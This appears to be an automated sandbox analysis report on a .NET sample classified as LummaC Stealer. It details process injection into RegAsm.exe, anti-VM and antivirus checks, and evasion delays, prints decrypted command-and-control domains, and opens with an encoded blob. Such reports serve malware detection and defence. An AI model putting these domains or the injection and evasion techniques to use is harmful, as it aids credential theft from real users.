dNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/7@1/2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00439250 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,5_2_00439250
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZjH6H6xqo7.exe.logJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeFile created: C:\Users\user\AppData\Local\Temp\up5gphghJump to behavior
        Source: ZjH6H6xqo7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: ZjH6H6xqo7.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: ZjH6H6xqo7.exeReversingLabs: Detection: 71%
        Source: ZjH6H6xqo7.exeVirustotal: Detection: 65%
        Source: unknownProcess created: C:\Users\user\Desktop\ZjH6H6xqo7.exe "C:\Users\user\Desktop\ZjH6H6xqo7.exe"
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6781.tmp" "c:\Users\user\AppData\Local\Temp\up5gphgh\CSCE347F25DAC914FE0BD5774A121A2513C.TMP"
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline"Jump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6781.tmp" "c:\Users\user\AppData\Local\Temp\up5gphgh\CSCE347F25DAC914FE0BD5774A121A2513C.TMP"Jump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
        Source: ZjH6H6xqo7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: ZjH6H6xqo7.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: ZjH6H6xqo7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.pdb source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp
        Source: ZjH6H6xqo7.exeStatic PE information: 0xEFCB81EF [Wed Jun 26 13:28:15 2097 UTC]
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline"
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.dllJump to dropped file
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Yara detected AntiVM3
        Source: Yara matchFile source: Process Memory Space: ZjH6H6xqo7.exe PID: 5452, type: MEMORYSTR
        Query firmware table information (likely to detect VMs)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeMemory allocated: 1480000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeMemory allocated: 2F20000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeMemory allocated: 1480000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.dllJump to dropped file
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe TID: 344Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe TID: 6536Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5560Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: RegAsm.exe, 00000005.00000002.2267546315.0000000001545000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2267546315.000000000158A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2073668384.00000000011C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043E420 LdrInitializeThunk,5_2_0043E420
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        .NET source code references suspicious native API functions
        Source: 0.2.ZjH6H6xqo7.exe.5cf0000.1.raw.unpack, Engineers.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
        Source: 0.2.ZjH6H6xqo7.exe.5cf0000.1.raw.unpack, Engineers.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
        Source: 0.2.ZjH6H6xqo7.exe.5cf0000.1.raw.unpack, Engineers.csReference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)
        Allocates memory in foreign processes
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
        Compiles code for process injection (via .Net compiler)
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeFile written: C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.0.csJump to dropped file
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
        LummaC encrypted strings found
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002FC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: faintbl0w.sbs
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002FC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 300snails.sbs
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002FC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 3xc1aimbl0w.sbs
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002FC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: thicktoys.sbs
        Writes to foreign memory regions
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 442000Jump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 445000Jump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 455000Jump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 456000Jump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 11E8008Jump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline"Jump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6781.tmp" "c:\Users\user\AppData\Local\Temp\up5gphgh\CSCE347F25DAC914FE0BD5774A121A2513C.TMP"Jump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeQueries volume information: C:\Users\user\Desktop\ZjH6H6xqo7.exe VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Yara detected LummaC Stealer
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
